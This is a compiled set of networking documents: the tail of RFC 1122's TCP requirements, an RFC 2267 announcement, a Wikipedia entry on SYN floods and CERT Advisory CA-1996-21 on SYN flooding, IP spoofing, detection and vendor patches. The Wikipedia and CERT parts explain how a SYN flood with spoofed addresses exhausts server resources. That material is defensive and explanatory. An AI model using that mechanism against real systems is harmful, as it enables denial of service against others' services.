Urgent Data | | | | | | |
Pointer points to last octet |4.2.2.4 |x| | | | |
Arbitrary length urgent data sequence |4.2.2.4 |x| | | | |
Inform ALP asynchronously of urgent data |4.2.2.4 |x| | | | |1
ALP can learn if/how much urgent data Q'd |4.2.2.4 |x| | | | |1
| | | | | | |
TCP Options | | | | | | |
Receive TCP option in any segment |4.2.2.5 |x| | | | |
Ignore unsupported options |4.2.2.5 |x| | | | |
Cope with illegal option length |4.2.2.5 |x| | | | |
Implement sending & receiving MSS option |4.2.2.6 |x| | | | |
Send MSS option unless 536 |4.2.2.6 | |x| | | |
Send MSS option always |4.2.2.6 | | |x| | |
Send-MSS default is 536 |4.2.2.6 |x| | | | |
Calculate effective send seg size |4.2.2.6 |x| | | | |
| | | | | | |
TCP Checksums | | | | | | |
Sender compute checksum |4.2.2.7 |x| | | | |
Receiver check checksum |4.2.2.7 |x| | | | |
| | | | | | |
Use clock-driven ISN selection |4.2.2.9 |x| | | | |
| | | | | | |
Opening Connections | | | | | | |
Support simultaneous open attempts |4.2.2.10|x| | | | |
SYN-RCVD remembers last state |4.2.2.11|x| | | | |
Passive Open call interfere with others |4.2.2.18| | | | |x|
Function: simultan. LISTENs for same port |4.2.2.18|x| | | | |
Ask IP for src address for SYN if necc. |4.2.3.7 |x| | | | |
Otherwise, use local addr of conn. |4.2.3.7 |x| | | | |
OPEN to broadcast/multicast IP Address |4.2.3.14| | | | |x|
Silently discard seg to bcast/mcast addr |4.2.3.14|x| | | | |

RFC1122 TRANSPORT LAYER -- TCP October 1989

| | | | | | |
Closing Connections | | | | | | |
RST can contain data |4.2.2.12| |x| | | |
Inform application of aborted conn |4.2.2.13|x| | | | |
Half-duplex close connections |4.2.2.13| | |x| | |
Send RST to indicate data lost |4.2.2.13| |x| | | |
In TIME-WAIT state for 2xMSL seconds |4.2.2.13|x| | | | |
Accept SYN from TIME-WAIT state |4.2.2.13| | |x| | |
| | | | | | |
Retransmissions | | | | | | |
Jacobson Slow Start algorithm |4.2.2.15|x| | | | |
Jacobson Congestion-Avoidance algorithm |4.2.2.15|x| | | | |
Retransmit with same IP ident |4.2.2.15| | |x| | |
Karn's algorithm |4.2.3.1 |x| | | | |
Jacobson's RTO estimation alg. |4.2.3.1 |x| | | | |
Exponential backoff |4.2.3.1 |x| | | | |
SYN RTO calc same as data |4.2.3.1 | |x| | | |
Recommended initial values and bounds |4.2.3.1 | |x| | | |
| | | | | | |
Generating ACK's: | | | | | | |
Queue out-of-order segments |4.2.2.20| |x| | | |
Process all Q'd before send ACK |4.2.2.20|x| | | | |
Send ACK for out-of-order segment |4.2.2.21| | |x| | |
Delayed ACK's |4.2.3.2 | |x| | | |
Delay < 0.5 seconds |4.2.3.2 |x| | | | |
Every 2nd full-sized segment ACK'd |4.2.3.2 |x| | | | |
Receiver SWS-Avoidance Algorithm |4.2.3.3 |x| | | | |
| | | | | | |
Sending data | | | | | | |
Configurable TTL |4.2.2.19|x| | | | |
Sender SWS-Avoidance Algorithm |4.2.3.4 |x| | | | |
Nagle algorithm |4.2.3.4 | |x| | | |
Application can disable Nagle algorithm |4.2.3.4 |x| | | | |
| | | | | | |
Connection Failures: | | | | | | |
Negative advice to IP on R1 retxs |4.2.3.5 |x| | | | |
Close connection on R2 retxs |4.2.3.5 |x| | | | |
ALP can set R2 |4.2.3.5 |x| | | | |1
Inform ALP of R1<=retxs Recommended values for R1, R2 |4.2.3.5 | |x| | | |
Same mechanism for SYNs |4.2.3.5 |x| | | | |
R2 at least 3 minutes for SYN |4.2.3.5 |x| | | | |
| | | | | | |
Send Keep-alive Packets: |4.2.3.6 | | |x| | |
- Application can request |4.2.3.6 |x| | | | |
- Default is "off" |4.2.3.6 |x| | | | |
- Only send if idle for interval |4.2.3.6 |x| | | | |
- Interval configurable |4.2.3.6 |x| | | | |

RFC1122 TRANSPORT LAYER -- TCP October 1989

- Default at least 2 hrs. |4.2.3.6 |x| | | | |
- Tolerant of lost ACK's |4.2.3.6 |x| | | | |
| | | | | | |
IP Options | | | | | | |
Ignore options TCP doesn't understand |4.2.3.8 |x| | | | |
Time Stamp support |4.2.3.8 | | |x| | |
Record Route support |4.2.3.8 | | |x| | |
Source Route: | | | | | | |
ALP can specify |4.2.3.8 |x| | | | |1
Overrides src rt in datagram |4.2.3.8 |x| | | | |
Build return route from src rt |4.2.3.8 |x| | | | |
Later src route overrides |4.2.3.8 | |x| | | |
| | | | | | |
Receiving ICMP Messages from IP |4.2.3.9 |x| | | | |
Dest. Unreach (0,1,5) => inform ALP |4.2.3.9 | |x| | | |
Dest. Unreach (0,1,5) => abort conn |4.2.3.9 | | | | |x|
Dest. Unreach (2-4) => abort conn |4.2.3.9 | |x| | | |
Source Quench => slow start |4.2.3.9 | |x| | | |
Time Exceeded => tell ALP, don't abort |4.2.3.9 | |x| | | |
Param Problem => tell ALP, don't abort |4.2.3.9 | |x| | | |
| | | | | | |
Address Validation | | | | | | |
Reject OPEN call to invalid IP address |4.2.3.10|x| | | | |
Reject SYN from invalid IP address |4.2.3.10|x| | | | |
Silently discard SYN to bcast/mcast addr |4.2.3.10|x| | | | |
| | | | | | |
TCP/ALP Interface Services | | | | | | |
Error Report mechanism |4.2.4.1 |x| | | | |
ALP can disable Error Report Routine |4.2.4.1 | |x| | | |
ALP can specify TOS for sending |4.2.4.2 |x| | | | |
Passed unchanged to IP |4.2.4.2 | |x| | | |
ALP can change TOS during connection |4.2.4.2 | |x| | | |
Pass received TOS up to ALP |4.2.4.2 | | |x| | |
FLUSH call |4.2.4.3 | | |x| | |
Optional local IP addr parm. in OPEN |4.2.4.4 |x| | | | |
-------------------------------------------------|--------|-|-|-|-|-|--
-------------------------------------------------|--------|-|-|-|-|-|--

FOOTNOTES:

(1) "ALP" means Application-Layer program.

RFC1122 TRANSPORT LAYER -- TCP October 1989

5. REFERENCES

INTRODUCTORY REFERENCES

[INTRO:1] "Requirements for Internet Hosts -- Application and Support,"
IETF Host Requirements Working Group, R. Braden, Ed., RFC-1123,
October 1989.

[INTRO:2] "Requirements for Internet Gateways," R. Braden and J.
Postel, RFC-1009, June 1987.

[INTRO:3] "DDN Protocol Handbook," NIC-50004, NIC-50005, NIC-50006,
(three volumes), SRI International, December 1985.

[INTRO:4] "Official Internet Protocols," J. Reynolds and J. Postel,
RFC-1011, May 1987.

This document is republished periodically with new RFC numbers; the
latest version must be used.

[INTRO:5] "Protocol Document Order Information," O. Jacobsen and J.
Postel, RFC-980, March 1986.

[INTRO:6] "Assigned Numbers," J. Reynolds and J. Postel, RFC-1010, May
1987.

This document is republished periodically with new RFC numbers; the
latest version must be used.

[INTRO:7] "Modularity and Efficiency in Protocol Implementations," D.
Clark, RFC-817, July 1982.

[INTRO:8] "The Structuring of Systems Using Upcalls," D. Clark, 10th ACM
SOSP, Orcas Island, Washington, December 1985.

Secondary References:

[INTRO:9] "A Protocol for Packet Network Intercommunication," V. Cerf
and R. Kahn, IEEE Transactions on Communication, May 1974.

[INTRO:10] "The ARPA Internet Protocol," J. Postel, C. Sunshine, and D.
Cohen, Computer Networks, Vol. 5, No. 4, July 1981.

[INTRO:11] "The DARPA Internet Protocol Suite," B. Leiner, J. Postel,
R. Cole and D. Mills, Proceedings INFOCOM 85, IEEE, Washington DC,

RFC1122 TRANSPORT LAYER -- TCP October 1989

March 1985. Also in: IEEE Communications Magazine, March 1985.
Also available as ISI-RS-85-153.

[INTRO:12] "Final Text of DIS8473, Protocol for Providing the
Connectionless Mode Network Service," ANSI, published as RFC-994,
March 1986.

[INTRO:13] "End System to Intermediate System Routing Exchange
Protocol," ANSI X3S3.3, published as RFC-995, April 1986.

LINK LAYER REFERENCES

[LINK:1] "Trailer Encapsulations," S. Leffler and M. Karels, RFC-893,
April 1984.

[LINK:2] "An Ethernet Address Resolution Protocol," D. Plummer, RFC-826,
November 1982.

[LINK:3] "A Standard for the Transmission of IP Datagrams over Ethernet
Networks," C. Hornig, RFC-894, April 1984.

[LINK:4] "A Standard for the Transmission of IP Datagrams over IEEE 802
"Networks," J. Postel and J. Reynolds, RFC-1042, February 1988.

This RFC contains a great deal of information of importance to
Internet implementers planning to use IEEE 802 networks.

IP LAYER REFERENCES

[IP:1] "Internet Protocol (IP)," J. Postel, RFC-791, September 1981.

[IP:2] "Internet Control Message Protocol (ICMP)," J. Postel, RFC-792,
September 1981.

[IP:3] "Internet Standard Subnetting Procedure," J. Mogul and J. Postel,
RFC-950, August 1985.

[IP:4] "Host Extensions for IP Multicasting," S. Deering, RFC-1112,
August 1989.

[IP:5] "Military Standard Internet Protocol," MIL-STD-1777, Department
of Defense, August 1983.

This specification, as amended by RFC-963, is intended to describe

RFC1122 TRANSPORT LAYER -- TCP October 1989

the Internet Protocol but has some serious omissions (e.g., the
mandatory subnet extension [IP:3] and the optional multicasting
extension [IP:4]). It is also out of date. If there is a
conflict, RFC-791, RFC-792, and RFC-950 must be taken as
authoritative, while the present document is authoritative over
all.

[IP:6] "Some Problems with the Specification of the Military Standard
Internet Protocol," D. Sidhu, RFC-963, November 1985.

[IP:7] "The TCP Maximum Segment Size and Related Topics," J. Postel,
RFC-879, November 1983.

Discusses and clarifies the relationship between the TCP Maximum
Segment Size option and the IP datagram size.

[IP:8] "Internet Protocol Security Options," B. Schofield, RFC-1108,
October 1989.

[IP:9] "Fragmentation Considered Harmful," C. Kent and J. Mogul, ACM
SIGCOMM-87, August 1987. Published as ACM Comp Comm Review, Vol.
17, no. 5.

This useful paper discusses the problems created by Internet
fragmentation and presents alternative solutions.

[IP:10] "IP Datagram Reassembly Algorithms," D. Clark, RFC-815, July
1982.

This and the following paper should be read by every implementor.

[IP:11] "Fault Isolation and Recovery," D. Clark, RFC-816, July 1982.

SECONDARY IP REFERENCES:

[IP:12] "Broadcasting Internet Datagrams in the Presence of Subnets," J.
Mogul, RFC-922, October 1984.

[IP:13] "Name, Addresses, Ports, and Routes," D. Clark, RFC-814, July
1982.

[IP:14] "Something a Host Could Do with Source Quench: The Source Quench
Introduced Delay (SQUID)," W. Prue and J. Postel, RFC-1016, July
1987.

This RFC first described directed broadcast addresses. However,
the bulk of the RFC is concerned with gateways, not hosts.

RFC1122 TRANSPORT LAYER -- TCP October 1989

UDP REFERENCES:

[UDP:1] "User Datagram Protocol," J. Postel, RFC-768, August 1980.

TCP REFERENCES:

[TCP:1] "Transmission Control Protocol," J. Postel, RFC-793, September
1981.

[TCP:2] "Transmission Control Protocol," MIL-STD-1778, US Department of
Defense, August 1984.

This specification as amended by RFC-964 is intended to describe
the same protocol as RFC-793 [TCP:1]. If there is a conflict,
RFC-793 takes precedence, and the present document is authoritative
over both.

[TCP:3] "Some Problems with the Specification of the Military Standard
Transmission Control Protocol," D. Sidhu and T. Blumer, RFC-964,
November 1985.

[TCP:4] "The TCP Maximum Segment Size and Related Topics," J. Postel,
RFC-879, November 1983.

[TCP:5] "Window and Acknowledgment Strategy in TCP," D. Clark, RFC-813,
July 1982.

[TCP:6] "Round Trip Time Estimation," P. Karn & C. Partridge, ACM
SIGCOMM-87, August 1987.

[TCP:7] "Congestion Avoidance and Control," V. Jacobson, ACM SIGCOMM-88,
August 1988.

SECONDARY TCP REFERENCES:

[TCP:8] "Modularity and Efficiency in Protocol Implementation," D.
Clark, RFC-817, July 1982.

RFC1122 TRANSPORT LAYER -- TCP October 1989

[TCP:9] "Congestion Control in IP/TCP," J. Nagle, RFC-896, January 1984.

[TCP:10] "Computing the Internet Checksum," R. Braden, D. Borman, and C.
Partridge, RFC-1071, September 1988.

[TCP:11] "TCP Extensions for Long-Delay Paths," V. Jacobson & R. Braden,
RFC-1072, October 1988.

Security Considerations

There are many security issues in the communication layers of host
software, but a full discussion is beyond the scope of this RFC.

The Internet architecture generally provides little protection
against spoofing of IP source addresses, so any security mechanism
that is based upon verifying the IP source address of a datagram
should be treated with suspicion. However, in restricted
environments some source-address checking may be possible. For
example, there might be a secure LAN whose gateway to the rest of the
Internet discarded any incoming datagram with a source address that
spoofed the LAN address. In this case, a host on the LAN could use
the source address to test for local vs. remote source. This problem
is complicated by source routing, and some have suggested that
source-routed datagram forwarding by hosts (see Section 3.3.5) should
be outlawed for security reasons.

Security-related issues are mentioned in sections concerning the IP
Security option (Section 3.2.1.8), the ICMP Parameter Problem message
(Section 3.2.2.5), IP options in UDP datagrams (Section 4.1.3.2), and
reserved TCP ports (Section 4.2.2.1).

Author's Address

Robert Braden
USC/Information Sciences Institute
4676 Admiralty Way
Marina del Rey, CA 90292-6695

Phone: (213) 822 1511

EMail: Braden@ISI.EDU

Comment on RFC 1122

Comments about this RFC:

* RFC 1122: When reading the document I find a lot of lines (mainly in the introduction... by P-O Bergstr?m (8/18/2004)
* RFC 1122: I would like to see hello for all by ALI (10/9/2005)
* RFC 1122: your draft is very useful to me todo my project . so please thankful to u by jack (12/6/2003)
* RFC 1122: I note that rfc1122, in "3.5 INTERNET LAYER REQUIREMENTS SUMMARY", under... by AnonymousCoward (3/26/2004)

Previous: RFC 1121 - Act one - the poems

Next: RFC 1123 - Requirements for Internet Hosts - Application and Support

[ RFC Index | RFC Search | Usenet FAQs | Web FAQs | Documents | Cities ]

A new Request for Comments is now available in online RFC libraries.

RFC 2267:

Title: Network Ingress Filtering: Defeating Denial of
Service Attacks which employ IP Source Address
Spoofing
Author(s): P. Ferguson, D. Senie
Status: Informational
Date: January 1998
Mailbox: ferguson@cisco.com, dts@senie.com
Pages: 10
Characters: 21032
Updates/Obsoletes: None

URL: ftp://ds.internic.net/rfc/rfc2267.txt

Recent occurrences of various Denial of Service (DoS) attacks
which have employed forged source addresses have proven to be a
troublesome issue for Internet Service Providers and the Internet
community overall. This paper discusses a simple, effective,
and straightforward method for using ingress traffic filtering
to prohibit DoS attacks which use forged IP addresses to be
propagated from 'behind' an Internet Service Provider's (ISP)
aggregation point.

This memo provides information for the Internet community. It does
not specify an Internet standard of any kind. Distribution of this
memo is unlimited.

This announcement is sent to the IETF list and the RFC-DIST list.
Requests to be added to or deleted from the IETF distribution list
should be sent to IETF-REQUEST@IETF.ORG. Requests to be
added to or deleted from the RFC-DIST distribution list should
be sent to RFC-DIST-REQUEST@ISI.EDU.

Details on obtaining RFCs via FTP or EMAIL may be obtained by sending
an EMAIL message to rfc-info@ISI.EDU with the message body
help: ways_to_get_rfcs. For example:

To: rfc-info@ISI.EDU
Subject: getting rfcs

help: ways_to_get_rfcs

Requests for special distribution should be addressed to either the
author of the RFC in question, or to admin@DS.INTERNIC.NET. Unless
specifically noted otherwise on the RFC itself, all RFCs are for
unlimited distribution.

Submissions for Requests for Comments should be sent to
RFC-EDITOR@ISI.EDU. Please consult RFC 1543, Instructions to RFC
Authors, for further information.

Joyce K. Reynolds and Alegre Ramos
USC/Information Sciences Institute

SYN flood
From Wikipedia, the free encyclopedia
Jump to: navigation, search
A normal connection between a user (Alice) and a server. The three-way handshake is correctly performed.
Enlarge
A normal connection between a user (Alice) and a server. The three-way handshake is correctly performed.
SYN Flood. The attacker (Bob) sends several packets but does not send the "ACK" back to the server. The connections are hence half-opened and eat the server resources. Alice, a legitimate user, tries to connect but the server refuses to open a connection resulting in a denial of service.
Enlarge
SYN Flood. The attacker (Bob) sends several packets but does not send the "ACK" back to the server. The connections are hence half-opened and eat the server resources. Alice, a legitimate user, tries to connect but the server refuses to open a connection resulting in a denial of service.

A SYN flood is a form of denial-of-service attack in which an attacker sends a succession of SYN requests to a target's system.

When a client attempts to start a TCP connection to a server, the client and server exchange a series of messages which normally runs like this:

1. The client requests a connection by sending a SYN (synchronize) message to the server.
2. The server acknowledges this request by sending SYN-ACK back to the client, which,
3. Responds with an ACK, and the connection is established.

This is called the TCP three-way handshake, and is the foundation for every connection established using TCP/IP protocols.

This is a well known type of attack and is genereally not effective against modern networks. It works if a server allocates resources after receiving a SYN, but before it has received the ACK.

There are two methods, but both involve the server not receiving the ACK. A malicious client can skip sending this last ACK message. Or by spoofing the source IP address in the SYN, the server sends the SYN-ACK to the falsified IP address, and never receives the ACK. In both cases the server will wait for the acknowledgement for some time, as simple network congestion could also be the cause of the missing ACK.

If these half-open connections bind resources on the server, it may be possible to take up all these resources by flooding the server with SYN messages. Once all resources set aside for half-open connections are reserved, no new connections (legitimate or not) can be made, resulting in denial of service. Some systems may malfunction badly or even crash if other operating system functions are starved of resources this way.

Countermeasures include SYN cookies or limiting the number of new connections from a source per timeframe.

[edit] External link

* Official CERT advisory on SYN Attacks

Retrieved from "http://en.wikipedia.org/wiki/SYN_flood"

ERT® Advisory CA-1996-21 TCP SYN Flooding and IP Spoofing Attacks
Original issue date: September 19, 1996
Last revised: November 29, 2000
Updated vendor information for the Linux kernel.

A complete revision history is at the end of this file. This advisory supersedes the IP spoofing portion of CA-95.01.

Two "underground magazines" have recently published code to conduct denial-of-service attacks by creating TCP "half-open" connections. This code is actively being used to attack sites connected to the Internet. There is, as yet, no complete solution for this problem, but there are steps that can be taken to lessen its impact. Although discovering the origin of the attack is difficult, it is possible to do; we have received reports of attack origins being identified.

Any system connected to the Internet and providing TCP-based network services (such as a Web server, FTP server, or mail server) is potentially subject to this attack. Note that in addition to attacks launched at specific hosts, these attacks could also be launched against your routers or other network server systems if these hosts enable (or turn on) other TCP services (e.g., echo). The consequences of the attack may vary depending on the system; however, the attack itself is fundamental to the TCP protocol used by all systems.

If you are an Internet service provider, please pay particular attention to Section III and Appendix A, which describes step we urge you to take to lessen the effects of these attacks. If you are the customer of an Internet service provider, please encourage your provider to take these steps.

This advisory provides a brief outline of the problem and a partial solution. We will update this advisory as we receive new information. If the change in information warrants, we may post an updated advisory on comp.security.announce and redistribute an update to our cert-advisory mailing list. As always, the latest information is available at the URLs listed at the end of this advisory.

I. Description
When a system (called the client) attempts to establish a TCP connection to a system providing a service (the server), the client and server exchange a set sequence of messages. This connection technique applies to all TCP connections--telnet, Web, email, etc.

The client system begins by sending a SYN message to the server. The server then acknowledges the SYN message by sending SYN-ACK message to the client. The client then finishes establishing the connection by responding with an ACK message. The connection between the client and the server is then open, and the service-specific data can be exchanged between the client and the server. Here is a view of this message flow:

Client Server
------ ------
SYN-------------------->

<--------------------SYN-ACK

ACK-------------------->

Client and server can now
send service-specific data

The potential for abuse arises at the point where the server system has sent an acknowledgment (SYN-ACK) back to client but has not yet received the ACK message. This is what we mean by half-open connection. The server has built in its system memory a data structure describing all pending connections. This data structure is of finite size, and it can be made to overflow by intentionally creating too many partially-open connections.

Creating half-open connections is easily accomplished with IP spoofing. The attacking system sends SYN messages to the victim server system; these appear to be legitimate but in fact reference a client system that is unable to respond to the SYN-ACK messages. This means that the final ACK message will never be sent to the victim server system.

The half-open connections data structure on the victim server system will eventually fill; then the system will be unable to accept any new incoming connections until the table is emptied out. Normally there is a timeout associated with a pending connection, so the half-open connections will eventually expire and the victim server system will recover. However, the attacking system can simply continue sending IP-spoofed packets requesting new connections faster than the victim system can expire the pending connections.

In most cases, the victim of such an attack will have difficulty in accepting any new incoming network connection. In these cases, the attack does not affect existing incoming connections nor the ability to originate outgoing network connections.

However, in some cases, the system may exhaust memory, crash, or be rendered otherwise inoperative.

The location of the attacking system is obscured because the source addresses in the SYN packets are often implausible. When the packet arrives at the victim server system, there is no way to determine its true source. Since the network forwards packets based on destination address, the only way to validate the source of a packet is to use input source filtering (see Appendix A).
II. Impact
Systems providing TCP-based services to the Internet community may be unable to provide those services while under attack and for some time after the attack ceases. The service itself is not harmed by the attack; usually only the ability to provide the service is impaired. In some cases, the system may exhaust memory, crash, or be rendered otherwise inoperative.
III. Solution
There is, as yet, no generally accepted solution to this problem with the current IP protocol technology. However, proper router configuration can reduce the likelihood that your site will be the source of one of these attacks.

Appendix A contains details about how to filter packets to reduce the number of IP-spoofed packets entering and exiting your network. It also contains a list of vendors that have reported support for this type of filtering.

NOTE to Internet Service Providers:

We STRONGLY urge you to install these filters in your routers to protect your customers against this type of an attack. Although these filters do not directly protect your customers from attack, the filters do prevent attacks from originating at the sites of any of your customers. We are aware of the ramifications of these filters on some current Mobile IP schemes and are seeking a position statement from the appropriate organizations.

NOTE to customers of Internet service providers:

We STRONGLY recommend that you contact your service provider to verify that the necessary filters are in place to protect your network.

Many networking experts are working together to devise improvements to existing IP implementations to "harden" kernels to this type of attack. When these improvements become available, we suggest that you install them on all your systems as soon as possible. This advisory will be updated to reflect changes made by the vendor
IV. Detecting an Attack
Users of the attacked server system may notice nothing unusual since the IP-spoofed connection requests may not load the system noticeably. The system is still able to establish outgoing connections. The problem will most likely be noticed by client systems attempting to access one of the services on the victim system.

To verify that this attack is occurring, check the state of the server system's network traffic. For example, on SunOS this may be done by the command:

netstat -a -f inet

Note that use of the above command depends on the OS version, for example for a FreeBSD system use

netstat -s |grep "listenqueue overflows"

Too many connections in the state "SYN_RECEIVED" could indicate that the system is being attacked.
Appendix A - Reducing IP Spoofed Packets
1. Filtering Information
With the current IP protocol technology, it is impossible to eliminate IP-spoofed packets. However, you can take steps to reduce the number of IP-spoofed packets entering and exiting your network.

Currently, the best method is to install a filtering router that restricts the input to your external interface (known as an input filter) by not allowing a packet through if it has a source address from your internal network. In addition, you should filter outgoing packets that have a source address different from your internal network to prevent a source IP spoofing attack from originating from your site.

The combination of these two filters would prevent outside attackers from sending you packets pretending to be from your internal network. It would also prevent packets originating within your network from pretending to be from outside your network. These filters will *not* stop all TCP SYN attacks, since outside attackers can spoof packets from *any* outside network, and internal attackers can still send attacks spoofing internal addresses.

We STRONGLY urge Internet service providers to install these filters in your routers.

In addition, we STRONGLY recommend customers of Internet service providers to contact your service provider to verify that the necessary filters are in place to protect your network.
2. Vendor Information
The following vendor(s) have reported support for the type of filtering we recommend and provided pointers to additional information that describes how to configure your router. If we hear from other vendors, we will add their information to the "Updates" section at the end of this advisory.

If you need more information about your router or about firewalls, please contact your vendor directly.
Cisco
Refer to the section entitled "ISP Security Advisory" on http://www.cisco.com for an up-to-date explanation of how to address TCP SYN flooding on a Cisco router.

NOTE to vendors:

If you are a router vendor who has information on router capabilities and configuration examples and you are not represented in this list, please contact the CERT Coordination Center at the addresses given in the Contact Information section below. We will update the advisory after we hear from you.
3. Alternative for routers that do not support filtering on the inbound side
If your vendor's router does not support filtering on the inbound side of the interface or if there will be a delay in incorporating the feature into your system, you may filter the spoofed IP packets by using a second router between your external interface and your outside connection. Configure this router to block, on the outgoing interface connected to your original router, all packets that have a source address in your internal network. For this purpose, you can use a filtering router or a UNIX system with two interfaces that supports packet filtering.

Note: Disabling source routing at the router does not protect you from this attack, but it is still good security practice to follow.

On the input to your external interface, that is coming from the Internet to your network, you should block packets with the following addresses:

* Broadcast Networks: The addresses to block here are network 0 (the all zeros broadcast address) and network 255.255.255.255 (the all ones broadcast network).
*

Your local network(s): These are your network addresses
*

Reserved private network numbers: The following networks are defined as reserved private networks, and no traffic should ever be received from or transmitted to these networks through a router:

10.0.0.0 - 10.255.255.255 10/8 (reserved)
127.0.0.0 - 127.255.255.255 127/8 (loopback)
172.16.0.0 - 172.31.255.255 172.16/12 (reserved)
192.168.0.0 - 192.168.255.255 192.168/16 (reserved)

The CERT Coordination Center staff thanks the team members of NASIRC for contributing much of the text for this advisory and thanks the many experts who are devoting time to addressing the problem and who provided input to this advisory.

UPDATES
3COM
Please refer to the "Network Security Advisory" for a thorough discussion of how to address TCP SYN flooding attacks on a 3Com router:

http://www.3com.com/
Berkeley Software Design, Inc.
BSDI has patches available.

PATCH

K210-021 (ftp://ftp.bsdi.com/bsdi/patches/patches-2.1/K210-021)

md5 checksum: c386e72f41d0e409d91b493631e364dd K210-021

This patch adds two networking features that can help defeat and detect some types of denial of service attacks.

This patch requires U210-025 which provides new copies of sysctl(8) and netstat(1) for configuration and monitoring of these new features.

PATCH

K210-022 (ftp://ftp.bsdi.com/bsdi/patches/patches-2.1/K210-22)

md5 checksum: 9ec62b5e9cc424b9b42089504256d926 K210-022

This patch adds a TCP SYN cache which reduces and/or eliminates the effects of SYN-type denial of service attacks such as those discussed in CERT advisory CA 96.21.

PATCH

U210-025 (ftp://ftp.bsdi.com/bsdi/patches/patches-2.1/U210-025)

md5 checksum: d2ee01238ab6040e9b7a1bd2c3bf1016 U210-025

This patch should be installed in conjunction with IP source address check and IP fragmentation queue limit patch (K210-021) and SYN flooding patch (K210-022).

Additional details about these patches are available from

http://www.bsdi.com
ftp://ftp.bsdi.com

Hewlett-Packard Company
HPSBUX9704-060

Description: SYN Flooding Security Vulnerability in HP-UX

HEWLETT-PACKARD SECURITY BULLETIN: #00060

Security Bulletins are available from the HP Electronic
Support Center via electronic mail.

User your browser to get to the HP Electronic Support
Center page at:

http://us-support.external.hp.com
(for US, Canada, Asia-Pacific, & Latin-America)

http://europe-support.external.hp.com
(for Europe)
IBM Corporation
Any system that is connected to a TCP/IP-based network (Internet or intranet) and offers TCP-based services is vulnerable to the SYN flood attack. The attack does not distinguish between operating systems, software version levels, or hardware platforms; all systems are vulnerable. IBM has released AIX operating system fixes for the SYN flood vulnerability.

NOTE: If you are using the IBM Internet Connection Secured Network Gateway (SNG) firewall software, you must also apply the fixes listed in the next section.

The following Automated Program Analysis Reports (APARs) for IBM AIX are now available to address the SYN flood attack:
AIX 3.2.5
No APAR available; upgrade to AIX 4.x recommended
AIX 4.1.x
APAR - IX62476
AIX 4.2.x
APAR - IX62428
Fixes for IBM SNG Firewall
The following Automated Program Analysis Reports (APARs) for the IBM Internet Connection Secured Network Gateway firewall product are now available to address the SYN flood and "Ping o' Death" attacks:

NOTE: The fixes in this section should ONLY be applied to systems running the IBM Internet Connection Secured Network Gateway (SNG) firewall software. They should be applied IN ADDITION TO the IBM AIX fixes listed in the previous section.

IBM SNG V2.1
APAR - IR33376 PTF UR46673
IBM SNG V2.2
APAR - IR33484 PTF UR46641
Obtaining Fixes
IBM AIX APARs may be ordered using Electronic Fix Distribution (via the FixDist program), or from the IBM Support Center. For more information on FixDist, and to obtain fixes via the Internet, please reference

http://service.software.ibm.com/aixsupport/

or send electronic mail to "aixserv@austin.ibm.com " with the word "FixDist" in the "Subject:" line.
Linux

A patch for version 2.0.29 of the linux kernel source is available from:

http://www.kernel.org/pub/linux/kernel/v2.0/patch-2.0.30.gz

The patch allows tcp/ip processing to continue as normal, until the queue gets close to full. Then, instead of just sending the synack back, it sends a syn cookie back, and waits for a response to IT before sending the synack. When it sends the cookie, it clears the syn from the queue, so while under attack, the queue will never fill up. Cookies expire shortly after they are sent. Basically this prevents people from filling up the queue completely. No one flooding from a spoof will be able to reply to the cookie, so nothing can be overloaded. And if they aren't flooding from a spoof, they would be getting a cookie they would have to respond to, and would have a hard time responding to all the cookies and continuing the flood.
Livingston Enterprises, Inc.
Refer to the following Applications Note for more information on configuring a Livingston IRX or PortMaster to help block outgoing SYN attacks from an ISP's users:

ftp://ftp.livingston.com/pub/le/doc/notes/filters.syn-attack
Silicon Graphics, Inc.
Updated Silicon Graphics information concerning SYN attacks can be found in SGI Security Advisory, "IRIX IP Spoofing/TCP Sequence Attack Update," 19961202-01-PX, issued on August 6, 1998.

Patches are available via anonymous FTP and your service/support provider.

The SGI anonymous FTP site is sgigate.sgi.com (204.94.209.1) or its mirror, ftp.sgi.com. Security information and patches can be found in the ~ftp/security and ~ftp/patches directories, respectfully.

For subscribing to the wiretap mailing list and other SGI security related information, please refer to the Silicon Graphics Security Headquarters website located at:

http://www.sgi.com/Support/security
Sun Microsystems, Inc.
Sun published a bulletin on October 9, 1996--Sun security bulletin number 00136. Sun Security Bulletins are available via the security-alert@sun.com alias and on SunSolve.

Note: Advisories from vendors listed in this section can also be found at ftp://ftp.cert.org/pub/vendors/
This document is available from: http://www.cert.org/advisories/CA-1996-21.html
CERT/CC Contact Information

Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
U.S.A.

CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends.
Using encryption

We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from

http://www.cert.org/pgp/cert_pgp_key.asc

If you prefer to use DES, please call the CERT hotline for more information.
Getting security information

CERT publications and other security information are available from our web site

http://www.cert.org/

* "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.

NO WARRANTY
Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.
Conditions for use, disclaimers, and sponsorship information

Copyright 1996, 1997, 1998, 1999, 2000 Carnegie Mellon University.
Revision History

Nov. 29, 2000 Updated vendor information for the Linux kernel.
Aug. 24, 1998 Updated vendor information for Silicon Graphics, Inc.
Sep, 24, 1997 Updated copyright statement
July 18, 1997 Updates - added information
May 08, 1997 Updates - updated vendor information for Hewlett-Packard.
Jan. 02, 1997 Updates - added or modified vendor information for SGI,
Livingston, HP, 3COM.
Dec. 19, 1996 Updates - corrected Sun Microsystems security-alert email
address.
Dec. 10, 1996 Appendix A, #3 - corrected next to last reserved private
network number entry.
Dec. 09, 1996 Updates - added IBM patch information.
Nov. 12, 1996 Introduction, paragraph 2 - added some clarification.
Oct. 10, 1996 Updates - added a pointer to Sun Microsystems advisory.
added a pointer to the CERT /pub/vendors directory.
Oct. 08, 1996 Appendix A, #3 - revised the last item, reserved private
network numbers
Updates - added BSDI patch information.
Oct. 07, 1996 Updates - added a pointer to Silicon Graphics advisory.
Sep. 24, 1996 Modified the supersession statement.

TCP SYN attack
Last modified: Friday, September 09, 2005

